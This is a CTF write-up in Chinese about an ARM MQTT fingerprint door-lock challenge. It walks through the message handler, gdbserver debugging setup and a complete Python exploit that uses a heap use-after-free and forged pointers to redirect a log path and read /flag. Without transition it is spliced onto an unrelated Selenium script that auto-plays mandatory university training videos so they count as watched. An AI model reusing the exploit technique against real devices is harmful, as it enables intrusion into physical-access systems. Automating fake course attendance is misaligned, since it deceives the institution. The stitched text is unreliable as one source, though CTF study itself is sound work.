"request": "add_finger",
"req_args": [
"john_doe",
"password123",
]
}*/
// add_finger edit_finger remove_finger lock_door unlock_door
char *payload = (char*)message->payload;
char *session = nullptr;
char *request = nullptr;
char *req_args[2] = {nullptr, nullptr};
bool paese_res = parse_json(payload, &session, &request, req_args);
if (!paese_res) {
log("json parse error\n");
return;
}
if (!session_id || strcmp(session,session_id)) {
log("session id mismatch\n");
goto END;
}
char output[1024];
if (!strcmp(request,"add_finger")) {
if (req_args[0] && req_args[0][0]== '[' && req_args[0][strlen(req_args[0])-1] == ']') {
if (add_finger(req_args[0])) {
snprintf(output,1024,"new finger id:%d\n",max_finger_id-1);
publish(NULL,session_id,strlen(output),output);
goto END;
}
}
snprintf(output,1024,"add finger failed\n");
publish(NULL,session_id,strlen(output),output);
goto END;
}
else if (!strcmp(request,"edit_finger")) {
if(!req_args[0] || !req_args[1]) {
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
if (req_args[1][0] != '[' || req_args[1][strlen(req_args[1])-1] != ']') {
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
unsigned int finger_id = atoi(req_args[0]);
for (fingers * finger = finger_list; finger != NULL; finger = finger->next) {
if (finger->finger_id == finger_id) {
if (edit_finger(finger,req_args[1])) {
snprintf(output,1024,"changed finger id:%d\n",finger_id);
publish(NULL,session_id,strlen(output),output);
goto END;
} else {
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
}
}
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
else if (!strcmp(request,"remove_finger")) {
if (!req_args[0]) {
publish(NULL,session_id,21,"remove finger failed\n");
goto END;
}
unsigned int finger_id = atoi(req_args[0]);
if (remove_finger(finger_id)) {
snprintf(output,1024,"removed finger id:%d\n",finger_id);
publish(NULL,session_id,strlen(output),output);
goto END;
}
else {
publish(NULL,session_id,21,"remove finger failed\n");
goto END;
}
}
else if (!strcmp(request,"lock_door")) {
if (lock_door()) {
publish(NULL,session_id,18,"lock door success\n");
goto END;
} else {
publish(NULL,session_id,17,"lock door failed\n");
goto END;
}
}
else if (!strcmp(request,"unlock_door")) {
if (unlock_door()) {
publish(NULL,session_id,20,"unlock door success\n");
goto END;
} else {
publish(NULL,session_id,19,"unlock door failed\n");
goto END;
}
}
END:
if(session) free(session);
if(request) free(request);
if(req_args[0]) free(req_args[0]);
if(req_args[1]) free(req_args[1]);
return;
}
else if(!strcmp(message->topic, "logger")) {
char * payload = (char*)message->payload;
if (!auth_token){
publish(NULL, "logfile", 15, "not authorized\n");
return;
}
if (!strcmp(payload,"download")) {
download_log();
}
else if (!strcmp(payload,"clear")) {
clear_log();
}
}
else if(auth_token && !strcmp(message->topic, auth_token)) {
char * payload = (char*)message->payload;
char re_auth_token[20];
snprintf(re_auth_token, 20, "re_%s", auth_token);
fingers* cur_finger = finger_list;
while (cur_finger != NULL) {
if (check_finger(cur_finger,payload)) {
if (session_id) {
free(session_id);
unsubscribe(NULL, session_id);
}
session_id = (char*)malloc(0x11);
for (int i = 0; i<0x10;i++) {
session_id[i] = session_nums[(rand()%62)];
}
session_id[0x10] = 0;
char output_session[0x30];
snprintf(output_session, 0x30, "login successed. session_id: %s\n", session_id);
publish(NULL, re_auth_token, strlen(output_session), output_session);
return;
}
cur_finger = cur_finger->next;
}
publish(NULL, re_auth_token, 13, "login failed\n");
}
}

本题中最重要的函数,也就是mqtt客户端接收到信息的回调函数——on_message

image.png

首先是登录处理逻辑

这里需要用户在auth_token话题自定义一个token,然后系统会订阅token这个话题,此时auth_token不再为空,如果有新的token,会将原先的覆盖掉

image.png

如果话题是logger,那么就可以查看日志文件,泄露指纹信息,这里只要求auth_token有值,所以我们只需要一开始随意登录一下就可以了

image.png

这里对应的是身份认证处理逻辑,在登录(auth_token不为空)之后,就要发送指纹信息,随后check_finger函数就会检测是否是有效指纹,如果是,则会返回一个session_id

image.png

最后是manager话题,首先这个话题会利用parse_json函数解析出session,request,req_args这三个参数,随后会比较用户发送的session_id是否和成功认证返回的session_id相一致,如果一致,则会根据request对应的请求执行增删改操作

image.png

添加指纹操作

image.png

修改指纹操作

image.png

删除指纹操作

image.png

开关门操作

image.png

其他回调函数不重要

如何调试

准备gdbserver

由于本题是arm架构,所以首先你要准备一个arm架构的gdbserver,我是直接从FirmAE里面找gdbserver了

image.png

这里我选择用python起一个http服务,通过网络进行传输

修改启动脚本

这里我们要把启动脚本修改成如下代码

qemu-system-arm -m 512 -M virt,highmem=off \
-kernel zImage \
-initrd rootfs.cpio \
-net nic \
-net user,hostfwd=tcp::8883-:8883,hostfwd=tcp::1234-:1234 \
-nographic \
-monitor null

增添一个端口映射,这里我选择是1234,用于连接gdbserver,这个端口可以随意选择

传输gdbserver

我们需要将我们wsl里面的gdbserver传到qemu虚拟机里,幸运的是qemu虚拟机里自带了wget命令,因此我们直接通过网络传输即可

wget http://172.26.25.103:8000/gdbserver.armel
mv gdbserver.armel /bin/gdbserver
chmod +x /bin/gdbserver

gdbserver附加到现有进程

ps看一下进程

image.png

gdbserver --attach :1234 63

在本机中启动gdb-multiarch,然后输入

set architecture arm
set endian little
target remote localhost:1234
set glibc 2.38

由于这题是2.38版本的堆,所以需要额外设置一下libc版本

image.png

就可以愉快的开启调试了

EXP讲解

完整EXP如下

import paho.mqtt.client as mqtt
from pwn import *
import time
from time import sleep
import ssl
import re
import json

# MQTT Broker 配置
BROKER = "0.0.0.0"

PORT = 8883
# PORT = 50806
CAFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/ca.crt"
CERTFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.crt"
KEYFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.key"
AUTH_TOKEN_TOPIC = "auth_token"
VALID_TOKEN_TOPIC = "validtoken123123"
SESSION_ID_TOPIC = "#"  # 一开始订阅所有主题 (#)
mytime = 1
# 用于存储接收到的消息
received_messages = []

def pay(input_str, mylen=80):
# 如果字符串长度小于80,使用复制方式填充至80
while len(input_str) < mylen:
input_str += input_str

# 确保字符串的长度恰好为80
input_str = input_str[:mylen]

# 初始化结果数组
result = []

# 每4个字符一组
for i in range(0, len(input_str), 4):
# 取4个字符
chunk = input_str[i:i + 4]

# 将4个字符转换为对应的十六进制数字
hex_value = 0
for char in chunk:
hex_value = (hex_value << 8) + ord(char)

# 将结果添加到数组中
result.append(hex_value)

return result

def on_connect(client, userdata, flags, rc):
"""连接到 MQTT Broker 时的回调函数"""
print(f"Connected to MQTT Broker with result code {rc}")
client.subscribe(SESSION_ID_TOPIC)  # 订阅所有主题 (#),获取所有消息

def on_message(client, userdata, msg):
"""接收到消息时的回调函数"""
print(f"Received message on topic {msg.topic}: {msg.payload.decode()}")
userdata.append(msg.payload.decode())  # 保存接收到的消息

def publish_message(client, topic, message):
"""发布消息到指定的 MQTT 主题"""
print(f"Publishing message to {topic}: {message}")
client.publish(topic, message, qos=1)

def send_auth_token(client):
"""发送 auth_token 消息"""
message = "validtoken123123"
publish_message(client, AUTH_TOKEN_TOPIC, message)

def send_finger_data(client):
"""发送指纹数据"""
finger_data = "[1373378270,39159,3669886736,2494,2,515555555,2945791524,9283885,155241,259,30956741,169525,4196208728,2948318370,231700,2380113,8528,1416626613,3520135119,42949672977]"
# finger_data = "[1373378309,39159,2147483775,2494,2,515555574,2147483758,9283884,155241,259,30956739,169525,2147483479,2147483548,231699,2380112,8528,1416626458,2147483496,292]"
publish_message(client, VALID_TOKEN_TOPIC, finger_data)

def extract_session_id(messages):
"""从接收到的消息中提取 session_id"""
for message in messages:
match = re.search(r"session_id\s*[:=]\s*([a-zA-Z0-9]+)", message)
if match:
return match.group(1)  # 返回提取到的 session_id
return None

def convert_array_to_string(array):
"""自动将数组转换为字符串,格式为 "[\"element1\",\"element2\",...]",确保没有空格"""
return "[" + ",".join(f"{item}" for item in array) + "]"

def send_edit(client, session_id, index, payload):
"""发送 edit_finger 命令,确保 req_args 符合格式"""
req_args = [
str(index),  # 第一个元素是索引,确保是字符串类型
payload,
]
json_message = {
"session": session_id,
"request": "edit_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化,确保所有字符串都用双引号包裹
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def send_add_command(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
payload = pay(payload, 88)
req_args = [
convert_array_to_string(payload)  # 指纹数据转为字符串格式
]
json_message = {
"session": session_id,
"request": "add_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def send_add(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
req_args = [payload]
json_message = {
"session": session_id,
"request": "add_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def send_log(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
req_args = [payload]
json_message = {
"session": session_id,
"request": "add_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "logger", "download")
sleep(mytime)

def send_malloc(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
req_args = [payload]
json_message = {
"session": session_id + " aaaabaa////flagaeaaafaaagaaahaaaiaaajaaakaaalaa\x0a\x0aaaanaaaoaaapa" + "/flag" + "\x10\x00\x00\x00\x00\x00\x00",
"request": "kiddingyou",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def send_remove_command(client, session_id, index):
"""发送 remove_finger 命令,确保 req_args 符合格式"""
payload = pay("12345678")
req_args = [
f"{index}", convert_array_to_string(payload)
]
json_message = {
"session": session_id,
"request": "remove_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def main():
# 创建 MQTT 客户端实例
client = mqtt.Client(userdata=received_messages)

# 配置 SSL 连接
client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE)
client.tls_insecure_set(True)

# 设置回调函数
client.on_connect = on_connect
client.on_message = on_message

# 连接到 MQTT Broker
print(f"Connecting to MQTT Broker at {BROKER}:{PORT}...")
client.connect(BROKER, PORT, 60)

# 启动接收消息的循环
client.loop_start()

# 发送认证 token
send_auth_token(client)
print("\033[33mSent auth token and finger data.\033[0m")
time.sleep(mytime)  # 等待消息发送

# 发送有效的指纹数据
send_finger_data(client)
print("\033[33mSent finger data.\033[0m")
time.sleep(mytime)  # 等待消息发送

# 获取 session_id,监听接收到的消息
print("Waiting for session_id...")
time.sleep(mytime)  # 等待一段时间来接收消息

# 提取 session_id 并根据 session_id 去订阅该 session 的主题
session_id = extract_session_id(received_messages)

# session_id="02wakqZtjQ5rDm9G"

if session_id:
print(f"Session ID received: {session_id}")
# 这里用第一个命令行参数
offset = 0

# 订阅该 session_id 主题并等待接收指纹管理相关的消息
client.subscribe(f"{session_id}")
# 取消订阅全部
client.unsubscribe(SESSION_ID_TOPIC)
time.sleep(mytime)  # 等待消息
# 2 add free
send_add(client, session_id,
"[1633771874,a,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
pause()
# uaf 修改fd为自己-8
heap = 0x387898 + offset
xor = (heap - 8) ^ (heap >> 12)
send_edit(client, session_id, 2,
f"[{xor},0,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,97,0,0,0,0,0,0]")
pause()
# 申请到自己3
send_add(client, session_id,
"[1,2,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 申请到自己-8,为4
pause()
send_add(client, session_id,
"[0,97,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 此处修改next,为日志路径
log_path = 0x35b1f0 + offset
send_edit(client, session_id, 3, f"[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,703710,703710,{log_path},9]")
send_remove_command(client, session_id, 3)
send_remove_command(client, session_id, 1)
tmp1 = 0x39d8e0 + offset
tmp2 = 0x389108 + offset
tmp3 = 0x35b4d8 + offset
tmp4 = 0x399c20 + offset
tmp5 = 0x39a240 + offset
send_edit(client, session_id, 625,
f"[{tmp1},1,{tmp2},19,30,0,0,0,{tmp3},5,1634493999,103,0,0,0,0,0,0,{tmp4},{tmp5},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,]")
pause()
client.subscribe("#")
send_log(client, session_id, "/flag")
if "flag{" in received_messages or "TPCTF{" in received_messages or "tpctf{" in received_messages:
flag = (received_messages)
return flag
return 0
else:
print("No session ID found in received messages.")

# 停止 MQTT 客户端的循环并断开连接
client.loop_stop()
client.disconnect()

if __name__ == "__main__":
main()

接下来我们详细讲一下exp的原理

# 创建 MQTT 客户端实例
client = mqtt.Client(userdata=received_messages)

# 配置 SSL 连接
client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE)
client.tls_insecure_set(True)

# 设置回调函数
client.on_connect = on_connect
client.on_message = on_message

# 连接到 MQTT Broker
print(f"Connecting to MQTT Broker at {BROKER}:{PORT}...")
client.connect(BROKER, PORT, 60)

# 启动接收消息的循环
client.loop_start()

首先是mqtt服务器的初始化操作,后面都可以直接拿来复用,目的是链接mqtt的broker,初始化接收消息,完成连接等操作的回调函数

# 发送认证 token
send_auth_token(client)
print("\033[33mSent auth token and finger data.\033[0m")
time.sleep(mytime)  # 等待消息发送

# 发送有效的指纹数据
send_finger_data(client)
print("\033[33mSent finger data.\033[0m")
time.sleep(mytime)  # 等待消息发送

# 获取 session_id,监听接收到的消息
print("Waiting for session_id...")
time.sleep(mytime)  # 等待一段时间来接收消息

# 提取 session_id 并根据 session_id 去订阅该 session 的主题
session_id = extract_session_id(received_messages)

然后就是要发送认证token,发送成功之后,获得一个会话,然后如果指纹验证成功,就可以获得该会话的session_id,而正确的指纹数据就是通过前面的爆破exp获得

# 2 add free
send_add(client, session_id,
"[1633771874,a,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
pause()
# uaf 修改fd为自己-8
heap = 0x387898 + offset
xor = (heap - 8) ^ (heap >> 12)
send_edit(client, session_id, 2,
f"[{xor},0,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,97,0,0,0,0,0,0]")
pause()
# 申请到自己3
send_add(client, session_id,
"[1,2,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 申请到自己-8,为4
pause()
send_add(client, session_id,
"[0,97,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 此处修改next,为日志路径
log_path = 0x35b1f0 + offset
send_edit(client, session_id, 3, f"[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,703710,703710,{log_path},9]")
send_remove_command(client, session_id, 3)
send_remove_command(client, session_id, 1)
tmp1 = 0x39d8e0 + offset
tmp2 = 0x389108 + offset
tmp3 = 0x35b4d8 + offset
tmp4 = 0x399c20 + offset
tmp5 = 0x39a240 + offset
send_edit(client, session_id, 625,
f"[{tmp1},1,{tmp2},19,30,0,0,0,{tmp3},5,1634493999,103,0,0,0,0,0,0,{tmp4},{tmp5},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,]")

这一段就是攻击的核心代码,接下来结合调试进行讲解,建议读者在阅读时逐行下断点调试查看

image.png

第一次目的是制造uaf

刚刚malloc完:

image.png

被free掉之后:

image.png

然后利用edit修改:

image.png

由于log字符串对应的伪造堆块,在finger_id偏移处值为0x271,所以下一次edit要设置finger_id为0x271=625,其余值保持不变即可

send_edit(client, session_id, 625,
f"[{tmp1},1,{tmp2},19,30,0,0,0,{tmp3},5,1634493999,103,0,0,0,0,0,0,{tmp4},{tmp5},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,]"

这也就是为什么最后一次edit要有一个莫名其妙的625出现的原因

image.png

可以看到此时log字符串已经修改成了/flag

image.png

复现成功!

image.png

原理分析

​ python 的selenium 库可模拟人的行为去操作浏览器, 是web自动化测试工具, 同时也可定制一些特定脚本去模拟人观看视频.

​ selenium的使用需要用到浏览器驱动,此处以chrome为例进行测试.

环境配置与搭建

​ python:3.10

​ selenium:4.1.3

如何安装selenium?

在pycharm的Terminal(终端)执行pip install selenium

​ chrome:100.0.4896.75

​ 如何查看chrome版本?

在chrome地址栏输入chrome://version,第一行即是版本

​ chrome驱动:100.0.4896.60

如何根据下载驱动?

https://chromedriver.storage.googleapis.com/index.html在网址中找到对应chrome版本的驱动(版本号相近即可),

下载"chromedriver_win32.zip",将里面的"chromedriver.exe"放到与main.py同一目录下

成果演示


实现过程

1.安装完selenium和python后,将驱动安放好位置,还需要进行一些额外配置

首先将chrome安装目录"C:\Program Files\Google\Chrome\Application"(默认为这个,需要根据你的电脑自行查找)添加到环境变量path,添加过程详见百度

接着按下win+R,输入命令

chrome.exe --remote-debugging-port=9222 --user-data-dir="D:/selenium_test"

会打开浏览器调试窗口

2.我们首先需要在上一步打开的窗口人为登录,进入如下界面(若使用selenium登录需要用到验证码,而验证码的识别需要第三方接口...付费,因此略去)

3.接下来运行程序

注意问题

1.不要最小化浏览器,推荐在夜晚刷视频.

2.脚本虽设置检测暂停之后自动播放,但有时会遇到网站一直暂停的情况,此时需要点击浏览器聚焦

3.最好不要在调试浏览器的窗口新开标签页

4.无第三方题库接口,目前打算利用爬虫爬取题库,人工录入答案.

5.可使用浏览器插件global speed(同时点击设置,开启幽灵模式),开始16倍速,更为方便.

代码:

# chrome.exe --remote-debugging-port=9222 --user-data-dir="D:/selenium_test"
# https://dxpx.uestc.edu.cn/
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
import time


def address_pause():
    """处理视频暂停问题"""
    if wd.find_element(By.CSS_SELECTOR, '#wrapper > div > div.plyr__controls > button:nth-child(1)').get_attribute(
            "aria-label") == "Play":
        wd.find_element(By.CSS_SELECTOR, '#wrapper > div > div.plyr__controls > button:nth-child(1)').send_keys(
            Keys.ENTER)
        print("检测到视频暂停,继续播放")


def remove_blank():
    """更改属性target为'_self'"""
    js = 'var items = document.getElementsByTagName("a");for (var i = 0; i < items.length; i++) {var tmp = items[' \
         'i];tmp.target="_self";} '
    wd.execute_script(js)


def manage(j):
    """处理视频"""
    necessary = wd.find_elements(By.CSS_SELECTOR,
                                 'body > div > div.w1150 > div.wrap_right > div.lesson1_cont.q_lesson1_cont > '
                                 'div.lesson1_lists > ul > li')  # 必修的课程列表
    necessary[j].find_element(By.CSS_SELECTOR, 'h2 a').send_keys(Keys.ENTER)  # 此后进入视频
    time.sleep(3)
    little_one = wd.find_elements(By.CSS_SELECTOR, 'a[style]')  # 侧边栏的课程列表
    length_little_one = len(little_one)
    index = 1  # 第几个视频
    print("成功加载侧边栏的课程列表,一共{}个视频".format(length_little_one))
    for k in range(length_little_one):
        little_one = wd.find_elements(By.CSS_SELECTOR, 'a[style]')  # 侧边栏的课程列表
        print("正在播放第{}个视频,一共{}个".format(index, length_little_one))
        if "red" in little_one[k].get_attribute("style"):
            print("视频{}播放完成,即将播放下一个视频".format(index))
            index += 1
            continue
        little_one[k].send_keys(Keys.ENTER)
        while True:
            print("剩余时间:" + wd.find_element(By.CSS_SELECTOR, 'div[aria-label="Current time"]').get_attribute(
                "innerText").replace('-', ''))
            address_pause()
            time.sleep(3)
            if wd.find_element(By.CSS_SELECTOR, 'div[aria-label="Current time"]').get_attribute(
                    "innerText").replace('-', '') == "00:00":
                print('播放完成,点击按钮"我知道了"')
                break
        index += 1


# selenium预处理
option = Options()
option.add_experimental_option("debuggerAddress", "127.0.0.1:9222")
wd = webdriver.Chrome(service=Service('chromedriver.exe'), options=option)
wd.implicitly_wait(3)  # 隐式等待

study_list = wd.find_elements(By.CSS_SELECTOR, 'a.study')  # 按钮'开始学习'的列表
length_study_list = len(study_list)  # 一共几门课
index_study_list = 1
for i in range(length_study_list):
    study_list = wd.find_elements(By.CSS_SELECTOR, 'a.study')  # 按钮'开始学习'的列表
    if index_study_list == 0 or index_study_list == 1:
        index_study_list += 1
        continue
    study_list[i].send_keys(Keys.ENTER)  # 点击按钮'开始学习'
    wd.find_element(By.CSS_SELECTOR,
                    'body > div > div.w1150 > div.wrap_right > div.lesson1_cont.q_lesson1_cont > div.lesson1_title > '
                    'div > a:nth-child(2)').send_keys(
        Keys.ENTER)  # 点击‘按钮’必修
    necessary_list = wd.find_elements(By.CSS_SELECTOR,
                                      'body > div > div.w1150 > div.wrap_right > div.lesson1_cont.q_lesson1_cont > '
                                      'div.lesson1_lists > ul > li')  # 必修的课程列表
    tmp_url = wd.current_url
    length_necessary_list = len(necessary_list)  # 必修课的个数
    index_necessary_list = 1  # 第几个必修课
    remove_blank()  # 移除target="_blank"属性
    for j in range(length_necessary_list):
        manage(j)  # 处理视频
        wd.get(tmp_url)  # 处理完视频回退
        remove_blank()  # 移除target="_blank"属性
        print("专题{}/{}:完成必修课程{}/{},三秒后进入下一个课程...".format(index_study_list, length_study_list, index_necessary_list,
                                                         length_necessary_list))
        time.sleep(3)
        index_necessary_list += 1
    index_study_list += 1  # 专题加一
    wd.get("https://dxpx.uestc.edu.cn/jjfz/lesson")